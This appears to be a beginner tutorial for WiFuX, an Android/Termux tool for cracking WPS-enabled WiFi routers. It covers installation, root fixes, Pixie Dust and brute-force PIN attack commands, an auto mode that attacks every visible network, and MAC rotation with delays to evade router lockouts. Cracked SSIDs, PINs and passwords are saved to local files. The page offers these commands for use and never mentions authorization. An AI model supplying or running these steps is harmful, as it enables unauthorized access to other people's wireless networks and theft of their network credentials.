HomeTutorialArgumentsCommandsExamplesOutput Demo
GitHub Telegram
cd ..
Tutorial

Getting Started with WiFuX

A complete beginner guide — from Termux install to running your first WPS attack.

1

Requirements

Android deviceAny Android phone. No flagship required — WiFuX runs on low-end devices too.
TermuxInstall from F-Droid (NOT the Play Store — the Play Store version is restricted and outdated).
Root accessMagisk or KernelSU. WiFuX needs root to control the WiFi interface directly via wpa_supplicant.
2

Install WiFuX

Open Termux and run this one command. It clones the repo, installs all dependencies, and sets up the wifux command globally.

// termux
$curl -sLo installer.sh https://raw.githubusercontent.com/msrofficial/WiFuX/main/installer.sh && bash installer.sh

The installer creates a global wifux command in Termux's bin directory so you can run it from any folder.

3

Find your WiFi interface

WiFuX needs your interface name. On most Android devices it's wlan0, but it can vary.

// find interface
$ip link show

Or use:

// alternative
$iw dev

Look for names starting with wlan. Common: wlan0, wlan1, wlan2.

4

Fix root issues (if needed)

If you see "no superuser binary detected", run the built-in fix:

// termux
$wifux fix

Removes conflicting tsu packages, installs sudo, and scans known paths for a valid su binary from Magisk or KernelSU.

5

Run your first scan

Just run wifux — scans nearby networks, you pick one, Pixie Dust runs automatically.

// termux
$wifux
The network list color-codes targets: Green = fully vulnerable, Orange = partially vulnerable, Red = WPS locked, Cyan = known vendor.
6

Understanding the two attack modes

-K Pixie Dust

Fastest method. Extracts the PIN offline from the WPS handshake in seconds. Always try this first.

$sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -K
-B Bruteforce

Tries all ~11,000 WPS PIN combinations. Slower (hours) but works on any WPS router. Sessions are auto-saved.

$sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -B
--auto Area Scanner

Tries every visible network once per pass. Tracks attacked BSSIDs and skips them next visit.

$sudo python main.py -i wlan0 --auto
7

Where results are saved

When WiFuX cracks a network, credentials are written to multiple locations automatically:

store/WiFuX_saved_data.txtHuman-readable box format with SSID, PIN, PSK, timestamp
reports/stored.txtPlain text log of all cracked credentials
reports/stored.csvSpreadsheet-compatible CSV format
~/.WiFuX/sessions/Bruteforce session files for resume
~/.WiFuX/auto_results.jsonResults from --auto mode
8

Troubleshooting common errors

Error: Run it as root

Open a root shell first.

$su
Error: Unable to up interface

Wrong interface name or WiFi is off.

$ip link show
Error: WiFi is rfkill blocked

Use --handle-rfkill flag.

$sudo python main.py -i wlan0 -K --handle-rfkill
Error: No WPS networks found

Toggle WiFi off and on. Disable Android Location. Move closer.

Error: Pixie Dust always fails

Router is not vulnerable. Use bruteforce.

$sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -B
Error: Router keeps locking

Add delay + MAC rotation.

$sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -B -M -d 3